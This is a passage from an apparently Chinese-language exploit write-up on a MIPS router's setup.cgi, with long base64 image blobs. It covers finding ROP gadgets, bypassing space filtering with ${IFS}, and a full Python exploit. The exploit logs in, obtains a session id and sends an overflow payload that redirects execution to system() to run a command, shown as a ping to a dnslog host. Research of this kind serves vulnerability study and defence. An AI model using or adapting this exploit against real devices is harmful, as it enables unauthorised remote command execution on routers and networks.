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
|
|||
|
|
<p blockindex=79>在这里跳到 <code>$t9</code> 也就是 <code>system</code> 之后,会执行一下下面的那条语句(也就是 <code>5B068</code> 处的语句)之后才继续在 system 里面执行</p>
|
|||
|
|
<p blockindex=80>那么这个gadget 我们就可以把 sp + 0xa8 + 0x88 处放一个<code>command</code>的指针,这样就会调用 <code>system(ptr)</code> 了</p>
|
|||
|
|
<p blockindex=81>然后执行命令可以执行 <code>ping</code> 命令(其中 ping 需要绝对路径,需要注意):</p>
|
|||
|
|
<pre blockindex=82><code class="hljs language-bash">/bin/ping hv14uf.dnslog.cn -c 2
|
|||
|
|
</code></pre>
|
|||
|
|
<h3 blockindex=83>寻找gadgets</h3>
|
|||
|
|
<p blockindex=84>MIPS架构推荐使用<code>ropper</code>进行查找,查找时可以参考可被控制的寄存器来筛选gadget。</p>
|
|||
|
|
<pre blockindex=85><code class="hljs language-php">file setup.cgi
|
|||
|
|
search addiu <span class=hljs-variable>$a0</span>
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=86>一开始找到了这个,后来发现怎么也打不通</p>
|
|||
|
|
<pre blockindex=87><code class="hljs language-assembly">0x5556af20: addiu $a0, $sp, 0x18; lw $ra, 0x5c($sp); lw $v0, 0x18($sp); jr $ra; addiu $sp, $sp, 0x60;
|
|||
|
|
0x55567650: la $t9, system; nop; jalr $t9; nop;
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=88>后来翻了翻<a href=https://xuanxuanblingbling.github.io/ctf/pwn/2020/12/16/input/>CTF中常见的C语言输入函数截断属性总结 | Clang裁缝店 (xuanxuanblingbling.github.io)</a>发现是0x20截断了,所以我们system执行的<code>command</code>也需要<a href=https://blog.csdn.net/qq_43427482/article/details/109725672>绕过空格</a>。</p>
|
|||
|
|
<p blockindex=89><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABcMAAAJsCAYAAAAx/bv6AAAgAElEQVR4nOzdfXzT533v/1dD5fmgkskj6OdWJkMhyHTRj1ORDjXF0OA1GNq4aZ00MT3c/DjKI4WW0DHScGgYJIzGcxbK6pJBeqJRblZcBnSJ2xqRRKTgLBNrrB4eygqiIBpQy0OEWovz5XhWSX5/SLJuLPmG3ADi/fzL1verry4JdPm6Pt/P9bk+9M4777yDiIiIiIiIiIiIiEgJu+5yN0BERERERERERERE5P2mYLiIiIiIiIiIiIiIlDwFw0VERERERERERESk5CkYLiIiIiIiIiIiIiIlT8FwERERERERERERESl5CoaLiIiIiIiIiIiISMlTMFxERERERERERERESp6C4SIiIiIiIiIiIiJS8hQMFxEREREREREREZGSp2C4iIiIiIiIiIiIiJQ8BcNFREREREREREREpOQpGC4iIiIiIiIiIiIiJU/BcBEREREREREREREpeQqGi4iIiIiIiIiIiEjJUzBcREREREREREREREqeguEiIiIiIiIiIiIiUvIUDBcRERERERERERGRkqdguIiIiIiIiIiIiIiUPAXDRURERERERERERKTkKRguIiIiIiIiIiIiIiVPwXARERERERERERERKXkKhouIiIiIiIiIiIhIyVMwXERERERERERERERKnoLhIiIiIiIiIiIiIlLyFAwXERERERERERERkZKnYLiIiIiIiIiIiIiIlDwFw0VERERERERERESk5CkYLiIiIiIiIiIiIiIlT8FwERERERERERERESl5CoaLiIiIiIiIiIiISMlTMFxERERERERERERESp6C4SIiIiIiIiIiIiJS8hQMFxEREREREREREZGSp2C4iIiIiIiIiIiIiJQ8BcNFREREREREREREpOQpGC4iIiIiIiIiIiIiJe/Dl7sBkuvkyZOXuwkicpWpqKigq6vrcjdDRK4SFRUVAOo3RGTI1G+IyHBpjiIiw1VRUdE35ng/feidd955531/FRmydDD8pptuuswtEZGrRVdX1wfyB0NESkN6Yqp+Q0SGSv2GiAyX5igiMlwfVL+hMikiIiIiIiIiIiIiUvIUDBcRERERERERERGRkqdguIiIiIiIiIiIiIiUPAXDRURERERERERERKTkKRguIiIiIiIiIiIiIiVPwXAR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
|
|||
|
|
<p blockindex=90>同时在<code>FindForbidValue</code>函数里也check了一些敏感字符/关键字,包含这些字符的请求包将会被丢弃。</p>
|
|||
|
|
<p blockindex=91><img src="<a href=https://s2.loli.net/2022/01/13/1r5sHdV8MGNlgLY.png>https://s2.loli.net/2022/01/13/1r5sHdV8MGNlgLY.png</a>" alt="image-20220112183944202.png" style="zoom: 67%;" /></p>
|
|||
|
|
<p blockindex=92>后来还是用原来的(,将<code>command</code>写到 <code>$a0-0x60</code>上,跳到<code>0x55567650</code>执行就行了。</p>
|
|||
|
|
<pre blockindex=93><code class="hljs language-assembly">0x55592ce4: addiu $a0, $a0, -0x60; lw $ra, 0x1c($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20;
|
|||
|
|
0x55567650: la $t9, system; nop; jalr $t9; nop;
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=94>如果你也比较懒的的话,可以用<code>cyclic -l</code>来找偏移。</p>
|
|||
|
|
<p blockindex=95><img src=data:image/png;base64,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
|
|||
|
|
<p blockindex=96>调试时发现<code>$a0</code>的值会随长度变化而变化,所以得填充一下,调试时用的长度500,这里也pad到500,如果想执行更长的命令,可以增加一下payload长度。</p>
|
|||
|
|
<h3 blockindex=97>最终exp</h3>
|
|||
|
|
<pre blockindex=98><code class="hljs language-python"><span class=hljs-keyword>import</span> requests,re
|
|||
|
|
<span class=hljs-keyword>import</span> base64
|
|||
|
|
url = <span class=hljs-string>"http://192.168.1.1/"</span>
|
|||
|
|
user = <span class=hljs-string>"aaaa"</span>
|
|||
|
|
pwd = <span class=hljs-string>"xxxx!"</span>
|
|||
|
|
command = <span class=hljs-string>'/bin/ping xxx.dnslog.cn -c 4'</span>
|
|||
|
|
command = command.replace(<span class=hljs-string>" "</span>, <span class=hljs-string>"${IFS}"</span>)
|
|||
|
|
auth = <span class=hljs-string>"Basic "</span> + base64.b64encode((user + <span class=hljs-string>":"</span> + pwd).encode()).decode(<span class=hljs-string>"utf-8"</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-function><span class=hljs-keyword>def</span> <span class=hljs-title>login</span>():</span>
|
|||
|
|
get_sessionid = requests.get(url)
|
|||
|
|
sessionid = get_sessionid.headers[<span class=hljs-string>"Set-Cookie"</span>]
|
|||
|
|
headers = {
|
|||
|
|
<span class=hljs-string>"Authorization"</span> : auth,
|
|||
|
|
<span class=hljs-string>"Cookie"</span> : sessionid
|
|||
|
|
}
|
|||
|
|
r = requests.get(url,headers = headers)
|
|||
|
|
<span class=hljs-keyword>if</span> r.status_code == <span class=hljs-number>200</span>:
|
|||
|
|
<span class=hljs-built_in>print</span>(<span class=hljs-string>"[+] Login success!"</span>)
|
|||
|
|
<span class=hljs-keyword>return</span> sessionid
|
|||
|
|
<span class=hljs-keyword>else</span>:
|
|||
|
|
<span class=hljs-built_in>print</span>(<span class=hljs-string>"[-] Login failed!"</span>)
|
|||
|
|
exit(<span class=hljs-number>0</span>)
|
|||
|
|
|
|||
|
|
<span class=hljs-function><span class=hljs-keyword>def</span> <span class=hljs-title>get_sid</span>(<span class=hljs-params>sessionid</span>):</span>
|
|||
|
|
headers = {
|
|||
|
|
<span class=hljs-string>"Authorization"</span> : auth,
|
|||
|
|
<span class=hljs-string>"Cookie"</span> : sessionid
|
|||
|
|
}
|
|||
|
|
get_sid = requests.get(url + <span class=hljs-string>"fw_rules.htm"</span>,headers = headers)
|
|||
|
|
sid = re.findall(<span class=hljs-string>r'\?id=[a-f0-9]+'</span>, get_sid.content.decode(<span class=hljs-string>"utf-8"</span>))
|
|||
|
|
<span class=hljs-keyword>return</span> sid[<span class=hljs-number>0</span>]
|
|||
|
|
|
|||
|
|
<span class=hljs-function><span class=hljs-keyword>def</span> <span class=hljs-title>attack</span>(<span class=hljs-params>sessionid</span>):</span>
|
|||
|
|
attackurl = url + <span class=hljs-string>"setup.cgi"</span> + get_sid(sessionid)
|
|||
|
|
payload = <span class=hljs-string>"a"</span> * <span class=hljs-number>376</span>
|
|||
|
|
payload += <span class=hljs-string>"%e4%2c%59%55"</span> <span class=hljs-comment># ra = 0x55592ce4: addiu $a0, $a0, -0x60; lw $ra, 0x1c($sp); move $v0, $zero; jr $ra; addiu $sp, $sp, 0x20; </span>
|
|||
|
|
payload += <span class=hljs-string>"b"</span> * <span class=hljs-number>0x1c</span>
|
|||
|
|
payload += <span class=hljs-string>"%50%76%56%55"</span> <span class=hljs-comment># ra = 0x55567650: la $t9, system; nop; jalr $t9; nop;</span>
|
|||
|
|
payload += <span class=hljs-string>"c"</span> * <span class=hljs-number>8</span>
|
|||
|
|
payload += <span class=hljs-string>"%0a{}%0a"</span>.<span class=hljs-built_in>format</span>(command)
|
|||
|
|
pad = <span class=hljs-number>500</span> - (<span class=hljs-built_in>len</span>(payload) - <span class=hljs-number>4</span>)
|
|||
|
|
<span class=hljs-keyword>if</span>(pad >= <span class=hljs-number>0</span>):
|
|||
|
|
payload += <span class=hljs-string>"c"</span> * pad <span class=hljs-comment># pad len to 500</span>
|
|||
|
|
<span class=hljs-built_in>print</span>(<span class=hljs-string>"[+] Attack start"</span>)
|
|||
|
|
<span class=hljs-built_in>print</span>(attackurl,payload)
|
|||
|
|
data = <span class=hljs-string>"save=Apply&service_list="</span> + payload + <span class=hljs-string>"&fwout_action=0&fwout_laniptype=anyip&fwout_waniptype=anyip&fwout_logging=1&h_fwout_action=0&h_fwout_laniptype=anyip&h_fwout_waniptype=anyip&h_fwout_logging=1&h_service_list=AIM&c4_lan_start_ip=192.168.1.NaN&c4_lan_finish_ip=192.168.1.NaN&c4_wan_start_ip=&c4_wan_finish_ip=&h_ruleSelect=0&edit=0&todo=save&this_file=rule_out.htm&next_file=BKS_service_add.htm&SID="</span>
|
|||
|
|
headers = {
|
|||
|
|
<span class=hljs-string>"Cookie"</span> : sessionid,
|
|||
|
|
<span class=hljs-string>"Authorization"</span> : auth
|
|||
|
|
}
|
|||
|
|
r = requests.post(url = attackurl,data = data,headers = headers)
|
|||
|
|
<span class=hljs-keyword>if</span> r.status_code:
|
|||
|
|
<span class=hljs-built_in>print</span>(<span class=hljs-string>"[+] Attack success!, the result is:"</span>)
|
|||
|
|
<span class=hljs-built_in>print</span>(r.content)
|
|||
|
|
<span class=hljs-keyword>else</span>:
|
|||
|
|
<span class=hljs-built_in>print</span>(<span class=hljs-string>"[-] Attack failed!"</span>)
|
|||
|
|
exit(<span class=hljs-number>0</span>)
|
|||
|
|
|
|||
|
|
sessionid = login()
|
|||
|
|
attack(sessionid)
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=99><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAB8EAAAD2CAYAAABGBvYKAAAgAElEQVR4nOzdeXhU9aH/8U8meyZhCCELmQQkCwSQAJKkMRBkFRcWce0PUYroFX+/arkKpV6sWmupIipyrwItLlzRighqRalsyjWsRhQREIFECQmQBEJMJsswmfz+4MlcxqwzWQnv1/P4PHXmnXO+c+acA/Wbc45Hz549q9WKqiJ6qezex+V55FsFrH6pNVeFS0BH3x/s/oEqu/8pVQd2VcArj8rz7Omm/6yvv8pnPq7q4FD5//1JeeafaMWRXhrYngA6i1/++cX5Da7o6H//aQz7f8u61PeHX7LFD5K9Szd5fbdLhsryWu+f7zNEFXf/Xp7ZhxTw6lPtvv90tu0PADU4vzWM7dOy2J6uac7ff+rS1tu/pcff0ZXf+7jsgcEK+Nsf5VFWWmdzPmWcKm79v/J77xV5nCtQxd3zVO3j53jf64ev5b/iKbfWf/GyvfdscmsZrmjvv58DQGvyau0VeJ76ScaF/08Ga0VrrwqXgM66P1R16abK236rqp7x8tnyHn/gNxPbE0BH01J/fnF+uzxd6n//Yf9vWZf6/vBLtvjBsg67QX7nK+Xz7Q6n96ol2RKuknz8ZDj5U7PW01L7T2fb/gBQg/Nbw9g+LYvt2b7Y/q2rKZPX3ns2OU1QBz72f1pzSB0S//8OwKWg1SfBJfEHMpx0tv2hbNpc2a5MlST57P5Uvp+ta+cRXdrYngA6qub++cX57fJ2qf/9h/2/ZV3q+8PFvA7u0fmUsar49WydHzZBHmUlF97w8J